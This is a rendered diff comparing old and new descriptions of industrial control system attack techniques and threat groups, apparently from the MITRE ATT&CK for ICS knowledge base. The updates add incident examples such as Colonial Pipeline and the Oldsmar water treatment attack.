| t | 1 | Adversaries may seek to capture process image values related | t | 1 | Adversaries may seek to capture process image values related |
| > | to the inputs and outputs of a PLC. Within a PLC all input | > | to the inputs and outputs of a PLC. Within a PLC all input | ||
| > | and output states are stored into an I/O image. This image i | > | and output states are stored into an I/O image. This image i | ||
| > | s used by the user program instead of directly interacting w | > | s used by the user program instead of directly interacting w | ||
| > | ith physical I/O. (Citation: PLC-Blaster 2) | > | ith physical I/O. (Citation: PLC-Blaster 2) Adversaries may | ||
| > | collect the I/O Image state of a PLC by utilizing a device\u2019s | ||||
| > | Native API to access the memory regions directly. The colle | ||||
| > | ction of the PLC\u2019s I/O state could be used to replace values | ||||
| > | or inform future stages of an attack. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may attempt to disrupt essential components or s | t | 1 | Adversaries may attempt to disrupt essential components or s |
| > | ystems to prevent owner and operator from delivering product | > | ystems to prevent owner and operator from delivering product | ||
| > | s or services. (Citation: Reference - Corero) (Citation: Ref | > | s or services. (Citation: Reference - Corero) (Citation: Ref | ||
| > | erence - SANS - 201510) (Citation: Reference - RIoT) Adver | > | erence - SANS - 201510) (Citation: Reference - RIoT) Adver | ||
| > | saries may leverage malware to delete or encrypt critical da | > | saries may leverage malware to delete or encrypt critical da | ||
| > | ta on HMIs, workstations, or databases. | > | ta on HMIs, workstations, or databases. In the 2021 Colonial | ||
| > | Pipeline ransomware incident, pipeline operations were temp | ||||
| > | orally halted on May 7th and were not fully restarted until | ||||
| > | May 12th. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may cause loss of productivity and revenue throu | t | 1 | Adversaries may cause loss of productivity and revenue throu |
| > | gh disruption and even damage to the availability and integr | > | gh disruption and even damage to the availability and integr | ||
| > | ity of control system operations, devices, and related proce | > | ity of control system operations, devices, and related proce | ||
| > | sses. This technique may manifest as a direct effect of an I | > | sses. This technique may manifest as a direct effect of an I | ||
| > | CS-targeting attack or tangentially, due to an IT-targeting | > | CS-targeting attack or tangentially, due to an IT-targeting | ||
| > | attack against non-segregated environments. In some cases, t | > | attack against non-segregated environments. In cases where | ||
| > | his may result from the postponement and disruption of ICS o | > | these operations or services are brought to a halt, the loss | ||
| > | perations and production as part of a remediation effort. Op | > | of productivity may eventually present an impact for the en | ||
| > | erations may be brought to a halt and effectively stopped in | > | d-users or consumers of products and services. The disrupted | ||
| > | an effort to contain and properly remove malware or due to | > | supply-chain may result in supply shortages and increased p | ||
| > | the <span class=\"smw-format list-format \"><span class=\"smw-r | > | rices, among other consequences. A ransomware attack on an | ||
| > | ow\"><span class=\"smw-field\"><span class=\"smw-value\">Loss of | > | Australian beverage company resulted in the shutdown of some | ||
| > | Safety</span></span></span></span>. | > | manufacturing sites, including precautionary halts to prote | ||
| > | ct key systems. (Citation: Distrupted Operations at Lion Com | ||||
| > | pany June 2020) The company announced the potential for temp | ||||
| > | orary shortages of their products following the attack. (Cit | ||||
| > | ation: Distrupted Operations at Lion Company June 2020) (Cit | ||||
| > | ation: Lion Cyber Incident June 2020) In the 2021 Colonial | ||||
| > | Pipeline ransomware incident, the pipeline was unable to tra | ||||
| > | nsport approximately 2.5 million barrels of fuel per day to | ||||
| > | the East Coast. (Citation: Colonial Pipeline System Distrupt | ||||
| > | ion May 2021) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may manipulate the I/O image of PLCs through var | t | 1 | Adversaries may manipulate the I/O image of PLCs through var |
| > | ious means to prevent them from functioning as expected. Met | > | ious means to prevent them from functioning as expected. Met | ||
| > | hods of I/O image manipulation may include overriding the I/ | > | hods of I/O image manipulation may include overriding the I/ | ||
| > | O table via direct memory manipulation or using the override | > | O table via direct memory manipulation or using the override | ||
| > | function used for testing PLC programs. (Citation: Guidance | > | function used for testing PLC programs. (Citation: Guidance | ||
| > | - ISA PLC) During the PLC scan cycle, the state of the a | > | - ISA PLC) During the scan cycle, a PLC reads the status | ||
| > | ctual physical inputs is copied to a portion of the PLC memo | > | of all inputs and stores them in an image table.2 The image | ||
| > | ry, commonly called the input image table. When the program | > | table is the PLC\u2019s internal storage location where values o | ||
| > | is scanned, it examines the input image table to read the st | > | f inputs/outputs for one scan are stored while it executes t | ||
| > | ate of a physical input. When the logic determines the sta | > | he user program. After the PLC has solved the entire logic p | ||
| > | te of a physical output, it writes to a portion of the PLC m | > | rogram, it updates the output image table. The contents of t | ||
| > | emory commonly called the output image table. The output ima | > | his output image table are written to the corresponding outp | ||
| > | ge may also be examined during the program scan. To update t | > | ut points in I/O Modules. One of the unique characteristics | ||
| > | he physical outputs, the output image table contents are cop | > | of PLCs is their ability to override the status of a physic | ||
| > | ied to the physical outputs after the program is scanned. O | > | al discrete input or to override the logic driving a physica | ||
| > | ne of the unique characteristics of PLCs is their ability to | > | l output coil and force the output to a desired status. | ||
| > | override the status of a physical discrete input or to over | ||||
| > | ride the logic driving a physical output coil and force the | ||||
| > | output to a desired status. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may modify parameters used to instruct industria | t | 1 | Adversaries may modify parameters used to instruct industria |
| > | l control system devices. These devices operate via programs | > | l control system devices. These devices operate via programs | ||
| > | that dictate how and when to perform actions based on such | > | that dictate how and when to perform actions based on such | ||
| > | parameters. Such parameters can determine the extent to whic | > | parameters. Such parameters can determine the extent to whic | ||
| > | h an action is performed and may specify additional options. | > | h an action is performed and may specify additional options. | ||
| > | For example, a program on a control system device dictating | > | For example, a program on a control system device dictating | ||
| > | motor processes may take a parameter defining the total num | > | motor processes may take a parameter defining the total num | ||
| > | ber of seconds to run that motor. An adversary can pote | > | ber of seconds to run that motor. An adversary can pote | ||
| > | ntially modify these parameters to produce an outcome outsid | > | ntially modify these parameters to produce an outcome outsid | ||
| > | e of what was intended by the operators. By modifying system | > | e of what was intended by the operators. By modifying system | ||
| > | and process critical parameters, the adversary may cause Im | > | and process critical parameters, the adversary may cause Im | ||
| > | pact to equipment and/or control processes. Modified paramet | > | pact to equipment and/or control processes. Modified paramet | ||
| > | ers may be turned into dangerous, out-of-bounds, or unexpect | > | ers may be turned into dangerous, out-of-bounds, or unexpect | ||
| > | ed values from typical operations. For example, specifying t | > | ed values from typical operations. For example, specifying t | ||
| > | hat a process run for more or less time than it should, or d | > | hat a process run for more or less time than it should, or d | ||
| > | ictating an unusually high, low, or invalid value as a param | > | ictating an unusually high, low, or invalid value as a param | ||
| > | eter. In the Maroochy Attack, Vitek Boden gained remote co | > | eter. In the Maroochy Attack, Vitek Boden gained remote co | ||
| > | mputer access to the control system and altered data so that | > | mputer access to the control system and altered data so that | ||
| > | whatever function should have occurred at affected pumping | > | whatever function should have occurred at affected pumping | ||
| > | stations did not occur or occurred in a different way. The s | > | stations did not occur or occurred in a different way. The s | ||
| > | oftware program installed in the laptop was one developed by | > | oftware program installed in the laptop was one developed by | ||
| > | Hunter Watertech for its use in changing configurations in | > | Hunter Watertech for its use in changing configurations in | ||
| > | the PDS computers. This ultimately led to 800,000 liters of | > | the PDS computers. This ultimately led to 800,000 liters of | ||
| > | raw sewage being spilled out into the community. (Citation: | > | raw sewage being spilled out into the community. (Citation: | ||
| > | Maroochy - MITRE - 200808) | > | Maroochy - MITRE - 200808) In the Oldsmar water treatment at | ||
| > | tack, adversaries raised the sodium hydroxide setpoint value | ||||
| > | from 100 part-per-million (ppm) to 11,100 ppm, far beyond n | ||||
| > | ormal operating levels. (Citation: Oldsmar Water Treatment A | ||||
| > | ttack Feb 2021) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may leverage remote services to move between ass | t | 1 | Adversaries may leverage remote services to move between ass |
| > | ets and network segments. These services are often used to a | > | ets and network segments. These services are often used to a | ||
| > | llow operators to interact with systems remotely within the | > | llow operators to interact with systems remotely within the | ||
| > | network, some examples are RDP, SMB, SSH, and other similar | > | network, some examples are RDP, SMB, SSH, and other similar | ||
| > | mechanisms. Remote services could be used to support remote | > | mechanisms. Remote services could be used to support remote | ||
| > | access, data transmission, authentication, name resolution, | > | access, data transmission, authentication, name resolution, | ||
| > | and other remote functions. Further, remote services may be | > | and other remote functions. Further, remote services may be | ||
| > | necessary to allow operators and administrators to configure | > | necessary to allow operators and administrators to configure | ||
| > | systems within the network from their engineering or manage | > | systems within the network from their engineering or manage | ||
| > | ment workstations. An adversary may use this technique to ac | > | ment workstations. An adversary may use this technique to ac | ||
| > | cess devices which may be dual-homed to multiple network seg | > | cess devices which may be dual-homed to multiple network seg | ||
| > | ments, and can be used for Program Download or to execute at | > | ments, and can be used for Program Download or to execute at | ||
| > | tacks on control devices directly through Valid Accounts. Sp | > | tacks on control devices directly through Valid Accounts. Sp | ||
| > | ecific remote services (RDP & VNC) may be a precursor to ena | > | ecific remote services (RDP & VNC) may be a precursor to ena | ||
| > | ble Graphical User Interface execution on devices such as HM | > | ble Graphical User Interface execution on devices such as HM | ||
| > | Is or engineering workstation software. | > | Is or engineering workstation software. In the Oldsmar water | ||
| > | treatment attack, adversaries gained access to the system t | ||||
| > | hrough remote access software, allowing for the use of the s | ||||
| > | tandard operator HMI interface.(Citation: Oldsmar Water Trea | ||||
| > | tment Attack Feb 2021) Based on incident data, CISA and FBI | ||||
| > | assessed that Chinese state-sponsored actors also compromise | ||||
| > | d various authorized remote access channels, including syste | ||||
| > | ms designed to transfer data and/or allow access between cor | ||||
| > | porate and ICS networks.(Citation: CISA Chinese Gas Pipeline | ||||
| > | Intrusion 2011 - 2013 July 2021) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may use a spearphishing attachment, a variant of | t | 1 | Adversaries may use a spearphishing attachment, a variant of |
| > | spearphishing, as a form of a social engineering attack aga | > | spearphishing, as a form of a social engineering attack aga | ||
| > | inst specific targets. Spearphishing attachments are differe | > | inst specific targets. Spearphishing attachments are differe | ||
| > | nt from other forms of spearphishing in that they employ mal | > | nt from other forms of spearphishing in that they employ mal | ||
| > | ware attached to an email. All forms of spearphishing are el | > | ware attached to an email. All forms of spearphishing are el | ||
| > | ectronically delivered and target a specific individual, com | > | ectronically delivered and target a specific individual, com | ||
| > | pany, or industry. In this scenario, adversaries attach a fi | > | pany, or industry. In this scenario, adversaries attach a fi | ||
| > | le to the spearphishing email and usually rely upon User Exe | > | le to the spearphishing email and usually rely upon User Exe | ||
| > | cution to gain execution and access. (Citation: EAttack Spea | > | cution to gain execution and access. (Citation: EAttack Spea | ||
| > | rphishing Attachment) | > | rphishing Attachment) A Chinese spearphishing campaign runni | ||
| > | ng from December 9, 2011 through February 29, 2012, targeted | ||||
| > | ONG organizations and their employees. The emails were cons | ||||
| > | tructed with a high level of sophistication to convince empl | ||||
| > | oyees to open the malicious file attachments.(Citation: CISA | ||||
| > | Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may send unauthorized command messages to instru | t | 1 | Adversaries may send unauthorized command messages to instru |
| > | ct control system assets to perform actions outside of their | > | ct control system assets to perform actions outside of their | ||
| > | intended functionality, or without the logical precondition | > | intended functionality, or without the logical precondition | ||
| > | s to trigger their expected function. Command messages are u | > | s to trigger their expected function. Command messages are u | ||
| > | sed in ICS networks to give direct instructions to control s | > | sed in ICS networks to give direct instructions to control s | ||
| > | ystems devices. If an adversary can send an unauthorized com | > | ystems devices. If an adversary can send an unauthorized com | ||
| > | mand message to a control system, then it can instruct the c | > | mand message to a control system, then it can instruct the c | ||
| > | ontrol systems device to perform an action outside the norma | > | ontrol systems device to perform an action outside the norma | ||
| > | l bounds of the device's actions. An adversary could potenti | > | l bounds of the device's actions. An adversary could potenti | ||
| > | ally instruct a control systems device to perform an action | > | ally instruct a control systems device to perform an action | ||
| > | that will cause an Impact. In the Maroochy Attack, the adver | > | that will cause an Impact. (Citation: Research - Research - | ||
| > | sary used a dedicated analog two-way radio system to send fa | > | Taxonomy Cyber Attacks on SCADA) In the Maroochy Attack, the | ||
| > | lse data and instructions to pumping stations and the centra | > | adversary used a dedicated analog two-way radio system to s | ||
| > | l computer. In the Dallas Siren incident, adversaries were a | > | end false data and instructions to pumping stations and the | ||
| > | ble to send command messages to activate tornado alarm syste | > | central computer. (Citation: Maroochy - MITRE - 200808) In t | ||
| > | ms across the city without an impending tornado or other dis | > | he Dallas Siren incident, adversaries were able to send comm | ||
| > | aster. Alarms were activated more than a dozen times. These | > | and messages to activate tornado alarm systems across the ci | ||
| > | disruptions occurred once in 2017, and later in a nearby cou | > | ty without an impending tornado or other disaster. (Citation | ||
| > | nty in 2019. | > | :ZDNet Dallas April 2017) (Citation:StateScoop Dallas March | ||
| > | 2019) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may rely on a targeted organizations\u2019 user inter | t | 1 | Adversaries may rely on a targeted organizations' user inter |
| > | action for the execution of malicious code. User interaction | > | action for the execution of malicious code. User interaction | ||
| > | may consist of installing applications, opening email attac | > | may consist of installing applications, opening email attac | ||
| > | hments, or granting higher permissions to documents. Adver | > | hments, or granting higher permissions to documents. Adver | ||
| > | saries may embed malicious code or visual basic code into fi | > | saries may embed malicious code or visual basic code into fi | ||
| > | les such as Microsoft Word and Excel documents or software i | > | les such as Microsoft Word and Excel documents or software i | ||
| > | nstallers. (Citation: BlackEnergy - Booz Allen Hamilton) Exe | > | nstallers. (Citation: BlackEnergy - Booz Allen Hamilton) Exe | ||
| > | cution of this code requires that the user enable scripting | > | cution of this code requires that the user enable scripting | ||
| > | or write access within the document. Embedded code may not a | > | or write access within the document. Embedded code may not a | ||
| > | lways be noticeable to the user especially in cases of troja | > | lways be noticeable to the user especially in cases of troja | ||
| > | nized software. (Citation: Havex - F-Secure) | > | nized software. (Citation: Havex - F-Secure) A Chinese spear | ||
| > | phishing campaign running from December 9, 2011 through Febr | ||||
| > | uary 29, 2012 delivered malware through spearphishing attach | ||||
| > | ments which required user action to achieve execution.(Citat | ||||
| > | ion: CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 20 | ||||
| > | 21) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Lazarus Group](https://attack.mitre.org/groups/G0032) is a | t | 1 | [Lazarus Group](https://attack.mitre.org/groups/G0032) is a |
| > | threat group that has been attributed to the North Korean go | > | North Korean state-sponsored cyber threat group that has bee | ||
| > | vernment.(Citation: US-CERT HIDDEN COBRA June 2017) The grou | > | n attributed to the Reconnaissance General Bureau.(Citation: | ||
| > | p has been active since at least 2009 and was reportedly res | > | US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Ko | ||
| > | ponsible for the November 2014 destructive wiper attack agai | > | rean Cyber Groups September 2019) The group has been active | ||
| > | nst Sony Pictures Entertainment as part of a campaign named | > | since at least 2009 and was reportedly responsible for the N | ||
| > | Operation Blockbuster by Novetta. Malware used by [Lazarus G | > | ovember 2014 destructive wiper attack against Sony Pictures | ||
| > | roup](https://attack.mitre.org/groups/G0032) correlates to o | > | Entertainment as part of a campaign named Operation Blockbus | ||
| > | ther reported campaigns, including Operation Flame, Operatio | > | ter by Novetta. Malware used by [Lazarus Group](https://atta | ||
| > | n 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. | > | ck.mitre.org/groups/G0032) correlates to other reported camp | ||
| > | (Citation: Novetta Blockbuster) In late 2017, [Lazarus Grou | > | aigns, including Operation Flame, Operation 1Mission, Operat | ||
| > | p](https://attack.mitre.org/groups/G0032) used KillDisk, a d | > | ion Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novett | ||
| > | isk-wiping tool, in an attack against an online casino based | > | a Blockbuster) North Korean group definitions are known to | ||
| > | in Central America. (Citation: Lazarus KillDisk) North Kor | > | have significant overlap, and some security researchers repo | ||
| > | ean group definitions are known to have significant overlap, | > | rt all North Korean state-sponsored cyber activity under the | ||
| > | and the name [Lazarus Group](https://attack.mitre.org/group | > | name [Lazarus Group](https://attack.mitre.org/groups/G0032) | ||
| > | s/G0032) is known to encompass a broad range of activity. So | > | instead of tracking clusters or subgroups, such as [Andarie | ||
| > | me organizations use the name Lazarus Group to refer to any | > | l](https://attack.mitre.org/groups/G0138), [APT37](https://a | ||
| > | activity attributed to North Korea.(Citation: US-CERT HIDDEN | > | ttack.mitre.org/groups/G0067), [APT38](https://attack.mitre. | ||
| > | COBRA June 2017) Some organizations track North Korean clus | > | org/groups/G0082), and [Kimsuky](https://attack.mitre.org/gr | ||
| > | ters or groups such as Bluenoroff,(Citation: Kaspersky Lazar | > | oups/G0094). | ||
| > | us Under The Hood Blog 2017) [APT37](https://attack.mitre.or | ||||
| > | g/groups/G0067), and [APT38](https://attack.mitre.org/groups | ||||
| > | /G0082) separately, while other organizations may track some | ||||
| > | activity associated with those group names by the name Laza | ||||
| > | rus Group. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [OilRig](https://attack.mitre.org/groups/G0049) is a suspect | t | 1 | [OilRig](https://attack.mitre.org/groups/G0049) is a suspect |
| > | ed Iranian threat group that has targeted Middle Eastern and | > | ed Iranian threat group that has targeted Middle Eastern and | ||
| > | international victims since at least 2014. The group has ta | > | international victims since at least 2014. The group has ta | ||
| > | rgeted a variety of industries, including financial, governm | > | rgeted a variety of sectors, including financial, government | ||
| > | ent, energy, chemical, and telecommunications, and has large | > | , energy, chemical, and telecommunications. It appears the g | ||
| > | ly focused its operations within the Middle East. It appears | > | roup carries out supply chain attacks, leveraging the trust | ||
| > | the group carries out supply chain attacks, leveraging the | > | relationship between organizations to attack their primary t | ||
| > | trust relationship between organizations to attack their pri | > | argets. FireEye assesses that the group works on behalf of t | ||
| > | mary targets. FireEye assesses that the group works on behal | > | he Iranian government based on infrastructure details that c | ||
| > | f of the Iranian government based on infrastructure details | > | ontain references to Iran, use of Iranian infrastructure, an | ||
| > | that contain references to Iran, use of Iranian infrastructu | > | d targeting that aligns with nation-state interests. (Citati | ||
| > | re, and targeting that aligns with nation-state interests. ( | > | on: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig | ||
| > | Citation: Palo Alto OilRig April 2017) (Citation: ClearSky O | > | Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: P | ||
| > | ilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citat | > | alo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 20 | ||
| > | ion: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook | > | 17) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUA | ||
| > | Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit | > | DAGENT July 2018) | ||
| > | 42 QUADAGENT July 2018) This group was previously tracked un | ||||
| > | der two distinct groups, APT34 and OilRig, but was combined | ||||
| > | due to additional reporting giving higher confidence about t | ||||
| > | he overlap of the activity. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Rus | t | 1 | [TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Rus |
| > | sia-based threat group that has targeted critical infrastruc | > | sia-based threat group that has targeted critical infrastruc | ||
| > | ture. The group has been observed utilizing TRITON, a malwar | > | ture. The group has been observed utilizing [TRITON](https:/ | ||
| > | e framework designed to manipulate industrial safety systems | > | /attack.mitre.org/software/S0609), a malware framework desig | ||
| > | .(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Vele | > | ned to manipulate industrial safety systems.(Citation: FireE | ||
| > | s 2018)(Citation: FireEye TEMP.Veles JSON April 2019) | > | ye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: | ||
| > | FireEye TEMP.Veles JSON April 2019) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a | t | 1 | [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a |
| > | suspected Russian group that has targeted government entitie | > | suspected Russian group that has targeted government entitie | ||
| > | s and multiple U.S. critical infrastructure sectors since at | > | s and multiple U.S. critical infrastructure sectors since at | ||
| > | least March 2016. (Citation: US-CERT TA18-074A) (Citation: | > | least December 2015. (Citation: US-CERT TA18-074A) (Citatio | ||
| > | Symantec Dragonfly Sept 2017) There is debate over the exten | > | n: Symantec Dragonfly Sept 2017) There is debate over the ex | ||
| > | t of overlap between [Dragonfly 2.0](https://attack.mitre.or | > | tent of overlap between [Dragonfly 2.0](https://attack.mitre | ||
| > | g/groups/G0074) and [Dragonfly](https://attack.mitre.org/gro | > | .org/groups/G0074) and [Dragonfly](https://attack.mitre.org/ | ||
| > | ups/G0035), but there is sufficient evidence to lead to thes | > | groups/G0035), but there is sufficient evidence to lead to t | ||
| > | e being tracked as two separate groups. (Citation: Fortune D | > | hese being tracked as two separate groups. (Citation: Fortun | ||
| > | ragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY ) | > | e Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY ) |